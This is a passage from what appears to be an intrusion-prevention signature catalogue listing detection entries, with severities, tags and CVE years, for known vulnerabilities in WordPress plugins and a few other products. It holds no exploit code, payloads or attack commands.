Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879
Description:
Back to top

HTTP_CRL-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project LearnPress Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project LearnPress Plugin, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522

About this situation: An attempt to exploit a vulnerability in WordPress LearnPress plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project LearnPress Plugin, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1782-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522
Description:
Back to top

HTTP_CRL-Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000

About this situation: An attempt to exploit a vulnerability in WordPress LiteSpeed Cache plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000
Description:
Back to top

HTTP_CRL-Wordpress-Long-Password-DoS

About this situation: An attempt to exploit a vulnerability in WordPress detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2014, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1422-5242
Vulnerability: Wordpress-Long-Password-DoS
Description:
Back to top

HTTP_CRL-Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution

About this situation: An attempt to exploit a vulnerability in WordPress Project MailChimp Subscribe Forms Plugin detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, WordPress Project MailChimp Subscribe Forms Plugin, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution
Description:
Back to top

HTTP_CRL-Wordpress-MasterStudy-Admin-Account-Creation

About this situation: An attempt to exploit a vulnerability in the WordPress MasterStudy Plugin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress MasterStudy Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Vulnerability: Wordpress-MasterStudy-Admin-Account-Creation
Description:
Back to top

HTTP_CRL-Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project Metform Elementor Contact Form Builder Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1573-5242
Last changed: sgpkg-ips-1573-5242
Vulnerability: Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project Modern Events Calendar Lite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Modern Events Calendar Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1478-5242
Vulnerability: Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Multiple-File-Load-DoS-CVE-2018-6389

About this situation: A vulnerability in Wordpress
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: Wordpress-Multiple-File-Load-DoS-CVE-2018-6389
Description:
Back to top

HTTP_CRL-Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in WP Ninjas Ninja Forms File Upload detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WP Ninjas Ninja Forms File Upload, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Wordpress-Ninja-Forms-Plugin-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi

About this situation: An attempt to exploit a vulnerability in the Paid Membership Pro WordPress plugin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Paid Membership, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1560-5242
Vulnerability: Wordpress-Paid-Membership-Pro-Code-Unauthenticated-SQLi
Description:
Back to top

HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS

About this situation: An attempt to exploit a vulnerability in WordPress Project Paid Memberships Pro Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_getcheckoutbutton-Stored-XSS
Description:
Back to top

HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Paid Memberships Pro Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1597-5242
Vulnerability: Wordpress-Paid-Memberships-Pro-Plugin-Pmpro_shortcode_Membership-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Paid Memberships Pro Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1441-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: Wordpress-Paid-Memberships-Pro-Plugin-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project 10Web Photo Gallery detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress 10Web Photo Gallery Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1471-5242
Last changed: sgpkg-ips-1471-5242
Vulnerability: Wordpress-Photo-Gallery-Plugin-Filter_Tag-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Photo-Gallery-Plugin-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project 10Web Photo Gallery detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1448-5242
Last changed: sgpkg-ips-1448-5242
Vulnerability: Wordpress-Photo-Gallery-Plugin-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Plainview-Activity-Monitor-RCE

About this situation: An attempt to exploit a vulnerability in Wordpress Plainview Activity Monitor detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Plainview Activity Monitor, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Wordpress-Plainview-Activity-Monitor-RCE
Description:
Back to top

HTTP_CRL-Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Wordpress bbPress plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress bbPress, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: Wordpress-Plugin-BBPress-Unauthenticated-Privilege-Escalation
Description:
Back to top

HTTP_CRL-Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344

About this situation: An attempt to exploit a vulnerability in the WordPress Like Button Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Like Button Plugin, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Wordpress-Plugin-Like-Button-Authentication-Bypass-CVE-2019-13344
Description:
Back to top

HTTP_CRL-Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE

About this situation: An attempt to exploit a vulnerability in WordPress Plugin Pie Register detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Plugin Pie Register, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Vulnerability: Wordpress-Plugin-Pie-Register-Auth-Bypass-To-RCE
Description:
Back to top

HTTP_CRL-Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969

About this situation: An attempt to exploit a vulnerability in WordPress Plugin Pie Register 3.0.9 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Plugin Pie Register, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Vulnerability: Wordpress-Plugin-Pie-Register-Blind-SQL-Injection-CVE-2018-10969
Description:
Back to top

HTTP_CRL-Wordpress-Popular-Posts-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in the Wordpress Popular Posts Plugin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress Popular Posts Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: Wordpress-Popular-Posts-Authenticated-RCE
Description:
Back to top

HTTP_CRL-Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Popup Maker plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Vulnerability: Wordpress-Popup-Maker-Plugin-Popup-Settings-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Vulnerability: Wordpress-Query-Console-Remote-Code-Execution-CVE-2024-50498
Description:
Back to top

HTTP_CRL-Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Vulnerability: Wordpress-Really-Simple-Ssl-Plugin-Authentication-Bypass-CVE-2024-10924
Description:
Back to top

HTTP_CRL-Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi

About this situation: An attempt to exploit a vulnerability in the Wordpress RegistrationMagic Plugin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress RegistrationMagic Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: Wordpress-RegistrationMagic-Task_Ids-Authenticated-SQLi
Description:
Back to top

HTTP_CRL-Wordpress-Rest-API-Posts-Controller-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-856-5242
Vulnerability: Wordpress-Rest-API-Posts-Controller-Privilege-Escalation
Description:
Back to top

HTTP_CRL-Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in WordPress Project Royal Elementor Addons and Templates Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1710-5242
Vulnerability: Wordpress-Royal-Elementor-Addons-And-Templates-Plugin-Unrestricted-File-Upload
Description:
Back to top

HTTP_CRL-Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi

About this situation: An attempt to exploit a vulnerability in the WordPress Secure Copy Content Protection and Content Locking Plugin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Secure Copy Content Protection and Content Locking Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Vulnerability: Wordpress-Secure-Copy-Content-Protection-And-Content-Locking-Sccp-Id-SQLi
Description:
Back to top

HTTP_CRL-Wordpress-SEO-Plugin-Url-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project SEO Plugin by Squirrly SEO detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: Wordpress-SEO-Plugin-Url-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826

About this situation: An attempt to exploit a vulnerability in Wordpress Simple Ads Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Simple Ads Manager, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Wordpress-Simple-Ads-Manager-Information-Disclosure-CVE-2015-2826
Description:
Back to top

HTTP_CRL-Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project WP Statistics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1567-5242
Last changed: sgpkg-ips-1567-5242
Vulnerability: Wordpress-Statistics-Plugin-Template-Functions-Search_Engine-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project The Events Calendar Plugin
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: Wordpress-The-Events-Calendar-Plugin-Rsvp-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project TI WooCommerce Wishlist Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Vulnerability: Wordpress-TI-Woocommerce-Wishlist-Plugin-Item_Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection

About this situation: An attempt to exploit a vulnerability in TI WooCommerce Wishlist plugin for WordPress
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Wordpress-TI-Woocommerce-Wishlist-Plugin-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Tutor LMS Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: Wordpress-Tutor-Lms-Plugin-Get_instructors-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Ultimate Member Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Wordpress-Ultimate-Member-Plugin-Member_Directory_Meta-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress UserPro plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: Wordpress-UserPro-Plugin-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-W3-Total-Cache-PHP-Code-Execution

About this situation: An attempt to exploit a Wordpress W3 Total Cache PHP Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress W3 Total Cache, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1408-5242
Vulnerability: Wordpress-W3-Total-Cache-PHP-Code-Execution
Description:
Back to top

HTTP_CRL-Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Wordpress wp-gdpr-compliance plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Vulnerability: Wordpress-wp-gdpr-compliance-Plugin-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013

About this situation: An attempt to exploit a vulnerability in Wordpress WP Marketplace Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wordpress WP Marketplace Plugin, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: Wordpress-Wp-Marketplace-Plugin-RCE-CVE-2014-9013
Description:
Back to top

HTTP_CRL-Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370

About this situation: An attempt to exploit a vulnerability in WordPress WP Shortcodes Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: Wordpress-WP-Shortcodes-Plugin-Stored-Cross-Site-Scripting-CVE-2025-0370
Description:
Back to top

HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project WP Statistics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Vulnerability: Wordpress-Wp-Statistics-Plugin-Current_Page_Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project WP Statistics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Wordpress-Wp-Statistics-Plugin-Gettop-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project WP Statistics detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1483-5242
Vulnerability: Wordpress-Wp-Statistics-Plugin-IP-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in WordPress Project WPvivid Backup Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Vulnerability: Wordpress-Wpvivid-Backup-Plugin-Class-wpvivid-Directory-Traversal
Description:
Back to top

HTTP_CRL-Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in WordPress WPvivid Backup Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Wordpress-Wpvivid-Backup-Plugin-Phar-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in WordPress
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1152-5242
Vulnerability: Wordpress-Wp_Attached_File-Wp_Crop_Image-Directory-Traversal
Description:
Back to top

HTTP_CRL-WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003

About this situation: An attempt to exploit a vulnerability in WPCargo WordPress plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: WPCargo-Wordpress-Plugin-Arbitrary-File-Write-CVE-2021-25003
Description:
Back to top

HTTP_CRL-WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249

About this situation: An attempt to exploit a vulnerability in wpForo WordPress plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: WpForo-Wordpress-Plugin-LFI-SSRF-CVE-2023-2249
Description:
Back to top

HTTP_CRL-WSO2-Enterprise-Integrator-Validateconnection-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WSO2 Enterprise Integrator detected
Context: HTTP Normalized Request-Line
Severity: 7
